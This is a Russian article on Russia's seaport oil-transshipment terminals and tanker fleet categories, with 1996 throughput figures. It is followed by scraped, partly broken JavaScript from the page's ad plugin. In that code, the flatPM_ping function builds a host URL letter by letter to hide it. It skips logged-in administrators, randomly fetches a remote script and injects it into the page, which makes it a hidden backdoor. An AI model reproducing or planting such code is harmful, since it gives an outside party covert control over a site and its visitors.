Он может принимать и обрабатывать специализированные суда-танкеры грузоподъемностью до 250 тыс. т и обеспечивать скорость погрузки нефти до 15 тыс. т в час, но такой современный причал всего лишь один. Большинство причалов комплекса приспособлено к приему и обработке сравнительно небольших танкеров грузоподъемностью до 45 тыс. т.

Грузооборот комплекса в 1996 г. достиг 35,2 млн. т и, по существу, является максимальным. Из 35,2 млн. т более 34 млн. т составляет нефть для поставки на экспорт.

Анализ состояния технической базы комплекса показывает, что она нуждается в реконструкции и модернизации. К настоящему времени разработано и утверждено технико-экономическое обоснование (ТЭО) на дооборудование глубоководного причала №1А.

Реконструкция этого причала позволит принимать на нем к обработке танкеры грузоподъемностью до 80 тыс. т.

В связи с освоением новых месторождений нефти в Казахстане, Азербайджане и Чечне и ограниченными возможностями морского нефтеперевалочного комплекса в порту Новороссийск, рассматривается и прорабатывается вопрос о строительстве в районе Новороссийска принципиально нового морского нефтеперевалочного комплекса — терминала нефтеэкспортной системы Каспийского трубопроводного консорциума, который включает три причальные устройства, вынесенные на 5 км в море и соединенные с трубопроводами. Предусматривается, что грузооборот этого комплекса в перспективе составит 67 млн. т нефти, поставляемой на экспорт. Морской нефтеперевалочный комплекс в порту Туапсе может принимать танкеры грузоподъемностью до 45 тыс. т. В 1996 г. грузооборот комплекса по нефтегрузам составил 10,5 млн. т, в основном это нефть и нефтепродукты туапсинского нефтеперерабатывающего завода, поставляемые на экспорт. Достигнутый в 1996 г. грузооборот является максимальным.

В Балтийском бассейне после распада СССР Россия не имеет морских нефтеперевалочных комплексов, так как расположенный в порту Вентспилс отошел к Латвии. Он соединен трубопроводом с местами добычи нефти, и через него идет на экспорт примерно 25 млн. т нефти в год.

В портах Санкт-Петербург и Калининград имеются припортовые нефтяные терминалы; они не соединены с магистральными нефтепроводами; нефть и нефтепродукты на них поступают железнодорожным транспортом или морем.

Эти терминалы в основном используются для обеспечения каботажных перевозок (снабжение промышленных предприятий и населенных пунктов, расположенных на морском побережье) и бункеровки судов.

В настоящее время рассматривается вопрос о строительстве морских нефтеперевалочных комплексов в бухте Батарейная (нефтепродукты) и Приморске (нефть) с подведением к нему магистрального нефтепровода из Кириши.

В Северном бассейне в портах Архангельск и Мурманск имеются небольшие морские нефтеперевалочные комплексы, их грзуооборот составил за 1996 г. всего 0,6 млн. т. Эти комплексы используются для завоза нефтегрузов в районы Западной Арктики и обеспечения каботажных перевозок.

В дальневосточном бассейне в порту Находка имеется современный морской нефтеперевалочный комплекс, на который нефть и нефтепродукты поступают железнодорожным транспортом. Грузооборот комплекса за 1996 г. составил 3 млн. т, это в основном экспорт нефтегрузов.

Остальные припортовые нефтяные терминалы, расположенные в портах Владивосток, Ванино и др., используются для завоза нефтегрузов в районы Крайнего Севера (Восточная Арктика) и местности, приравненные к ним, а также для обеспечения каботажных перевозок и бункеровки судов.

В перспективе, в связи с открытием и освоением месторождений нефти на острове Сахалин, рассматривается вопрос о строительстве в этом районе новых морских нефтеперевалочных комплексов, через которые могло бы осуществляться снабжение нефтью и нефтепродуктами районов Дальнего Востока и Крайнего Севера (Восточная Арктика).

Анализ технического состояния морских нефтеперевалочных комплексов России показывает, что многие из них нуждаются в реконструкции и модернизации. Для увеличения экспорта нефти и нефтепродуктов через морские нефтеперевалочные комплексы России необходимы новые современные комплексы: один в Азово-Черноморском бассейне в районе Новороссийска, два — в Балтийском бассейне в Ленинградской области.

Перевозка нефти и нефтепродуктов морем производится специализированным танкерным флотом. Продолжающийся процесс углубленной специализации разделил танкерный флот на продуктовозы и три категории нефтевозов:

  • грузоподъемностью до 80 тыс. т;
  • грузоподъемностью от 80 до 120 тыс. т;
  • грузоподъемностью свыше 120 тыс. т.

К особой категории относятся танкеры грузоподъемностью более 250 тыс. т. Именно для такой классификации рассчитываются базисные ставки по направлениям перевозок и производится котировка тоннажа при фрахтовании. В мире танкерный флот разделился на два вида:

  • принадлежащий нефтяным компаниям;
  • принадлежащий независимым судовладельцам.

Количество танкерного флота, принадлежащего нефтяным компаниям, постоянно увеличивается. Крупнейшими владельцами танкерного флота являются нефтесиндикаты: «Шелл», «Стандарт», «Бритиш Петролеум», «Галф» и др.

Б.А.Носов, доктор экономических наук,зам. директора Союзморниипроекта;Н.В.Куликов, президент Компании

«Лукойл-Арктик-Танкер»

В этом же разделе:

Источник: https://gazovik-neft.ru/directory/article/transport-oil.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};